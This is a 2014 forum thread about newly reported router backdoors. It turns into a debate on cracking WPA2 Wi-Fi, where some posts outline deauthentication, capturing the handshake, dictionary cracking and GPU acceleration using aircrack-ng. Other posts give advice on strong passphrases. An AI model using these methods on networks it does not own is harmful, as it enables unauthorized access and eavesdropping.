1. Welcome to TechPowerUp Forums, Guest! Please check out our forum guidelines for info related to our community.

Another router backdoor found!

Discussion in 'Networking & Security' started by remixedcat, Jan 3, 2014.

  1. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    Gaping admin access holes found in SoHo routers from Linksys, Netgear and others


    Read more here:
    http://nakedsecurity.sophos.com/201...soho-routers-from-linksys-netgear-and-others/

    List of affected routers:
    http://wikidevi.com/w/index.php?tit...Global+type::~embedded*]]&p=format=broadtable
     
    Aquinus and Frick say thanks.
  2. newtekie1

    newtekie1 Semi-Retired Folder

    Joined:
    Nov 22, 2005
    Messages:
    22,871 (5.86/day)
    Thanks Received:
    8,824
    I think people are making larger deals out of both of these exploits. They aren't possible from outside of the network, which means you have to let the person on your network before they can exploit them. You should trust the people you let on your network any. But even if you do let shady people on your wireless, what is the most they can do by getting access to your router's config page? Reset it to factory defaults, maybe get your wireless key(which they probably already have since you let them on your network)? There isn't much harm that can be done by getting access to the router config, they are already on your network, there are far worse thing they could already be doing. You yourself have already made a huge breach in security by allowing them on your network in the first place.
     
    newconroer says thanks.
    10 Year Member at TPU Crunching for Team TPU
  3. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    sometimes going to the WAN IP you can access the router's config page. depends really.
     
  4. newtekie1

    newtekie1 Semi-Retired Folder

    Joined:
    Nov 22, 2005
    Messages:
    22,871 (5.86/day)
    Thanks Received:
    8,824
    In the case of Joel's backdoor that might be possible, but the user of the router would have to enable remote access, which is another major security risk(since it opens you up to a brute force). And I don't know of any SOHO router that comes with this option enabled by default.

    This latest exploit however seems like it has to be exploited from the inside since the listening service that is used by the exploit only listens on the wireless interface.
     
    10 Year Member at TPU Crunching for Team TPU
  5. silentbogo

    silentbogo

    Joined:
    Nov 20, 2013
    Messages:
    1,224 (1.25/day)
    Thanks Received:
    1,254
    Location:
    Dark and creepy attic
    You don't have to be trusted by the owner to gain access to the wireless network form the outside.
    With tools like aircrack-ng and similar you can get access to any WPA(2)/WPE protected network given enough time and effort.
    The potential security risks are enormous: you could monitor traffic, redirect it the way you want, even change the firmware of the router without the knowledge of the owner (how often do you check router's settings, if everything works the way it supposed to?).
     
  6. brandonwh64

    brandonwh64 Addicted to Bacon and StarCrunches!!!

    Joined:
    Sep 6, 2009
    Messages:
    19,283 (7.66/day)
    Thanks Received:
    6,744
    Location:
    Chatsworth, GA
    Yea these routers have a new feature were you can sign up at linksys or cisco's website and it allows you to configure your router from the internet kinda like a domain for your home network. I played with one the other day and that was the first thing I disabled for the customer.
     
    Crunching for Team TPU
  7. scoutingwraith

    scoutingwraith

    Joined:
    Jun 3, 2007
    Messages:
    726 (0.22/day)
    Thanks Received:
    60
    Hmm. I am a bit lost in this but will this exploit apply to DD-WRT firmware i have installed on my Belkin Router?
     
  8. newtekie1

    newtekie1 Semi-Retired Folder

    Joined:
    Nov 22, 2005
    Messages:
    22,871 (5.86/day)
    Thanks Received:
    8,824
    WEP is pretty easy to crack, but no one should be using that anyway. However, it is no trivial matter to crack WPA(2), the primary cracking tools for WPA actually exploit an issue with WPS(which again you should have turned off), they don't actually crack WPA.

    But again, once they have access to your network, there are far worse things they can do than hack your router and change some settings.

    I'm in my router viewing the settings pretty much weekly.

    No, the open source firmware shouldn't be affected by this.
     
    Last edited: Jan 11, 2014
    10 Year Member at TPU Crunching for Team TPU
  9. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA
    Please give us a cite that shows where WPA2 authentication with AES encryption using 8+ character non-dictionary passphrase has been cracked.
    Otherwise, "enough time" means centuries, if not millennia.
     
  10. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    Even Fluke Networks has a video how to crack wifi networks.
     
  11. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA
    Fluke has over 200 videos posted on youtube... that's hardly a cite.
     
  12. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
     
  13. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA
    That's not a crack; that's a deauthentication attack.
    That's the equivalent of saying a Distributed Denial of Service attack is breaking into someone's computer.
    Or that squirting all their locks full of epoxy will let you steal someone's car.

    Running deauth attacks is just being a twit. I've got a 3 pound engineer's hammer I'd use on whoever's computer running those I tracked down with my TechnoLab mini-yagi... :)
     
    Last edited: Jan 15, 2014
  14. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    Well you can use it to get keys and stuff it's part of the process though. There are several ways to get the keys and this is one of them.
     
  15. silentbogo

    silentbogo

    Joined:
    Nov 20, 2013
    Messages:
    1,224 (1.25/day)
    Thanks Received:
    1,254
    Location:
    Dark and creepy attic
    Once you've captured 4 way handshake - you have a source to recover WPA2 password.
    WPS not involved, no sledgehammer needed.
    There is a better video showing how to hack WPA2 network using this method:

    The only thing that's necessary at this point - is a decent set of dictionaries.

    I performed the same procedure on my test network, which was protected by 11 character password(asked my cousin to set one up, to be fair), and it worked with 2GB+ dictionary.
    The only limitation of this hacking technique is that it is viable only for dictionary cracking or small passwords, so if you are using 13(+)-symbol randomly generated mixed-case alphanumerical passphrase with special chars - you are relatively safe. Other than that - there are hundreds of different configurations of password libraries online, which existed since the time people were cracking zip-archives. I still have a CD with translit and keyboard-layut based dictionary for russian passwords laying somewhere around.
    Another thing that should be taken into account, is GPU processing.
    http://www.scmagazineuk.com/wifi-is-no-longer-a-viable-secure-connection/article/119294/
    If such thing was possible in 2008, think what you can do with a modern GPU with 5 to 10 times as many shader processors and a lot more computing power.
     
  16. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    It's hard to get a lower priced laptop that has a decent GPU to do that processing though.
     
  17. silentbogo

    silentbogo

    Joined:
    Nov 20, 2013
    Messages:
    1,224 (1.25/day)
    Thanks Received:
    1,254
    Location:
    Dark and creepy attic
    You only need a laptop to capture the handshake. Processing could be done at home.
     
  18. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA
    Except my spec was,
    "Please give us a cite that shows where WPA2 authentication with AES encryption using 8+ character non-dictionary passphrase has been cracked."

    Personally, I use the MD5 hash of the SHA1 hash of a non-dictionary word for a passphrase.
    e.g.
    P1a2s3s4W5o6r7d
    SHA1 = b30272e2a576f1d081ac4a4beb123bec5080ad31
    MD5 (of SHA1 hash) = 4141de03e086dcf354135800d8c5973e
    The only time it's a hassle is when you're associating a device with only an onscreen keyboard (instead of being able to copy+paste from the hash generator directly into wlassistant in linux distros, or WZC interface in windows).
    Good luck building a dictionary for that.

    I have my doubts about aircrack being able to reverse engineer those vectors even if 5 or more dictionary words are strung together with, say, the last letter of each word capitalized, either. e.g. thiS'SAsimplEyeTmostlYsecurEpassphrasE

    I think all the apps run in that video are in the fedora security lab (FSL) spin, by the way:
    32-bit - http://torrent.fedoraproject.org/torrents/Fedora-Live-Security-i686-20.torrent
    64-bit - http://torrent.fedoraproject.org/torrents/Fedora-Live-Security-x86_64-20.torrent
     
  19. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    Since you know soooo muuuch about this you must know of a tool better then aircrack-ng???
     
  20. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA
    What's your budget?
     
  21. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    ummmmm like 20 dollars at most right now
     
    Arjai says thanks.
  22. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA

Currently Active Users Viewing This Thread: 1 (0 members and 1 guest)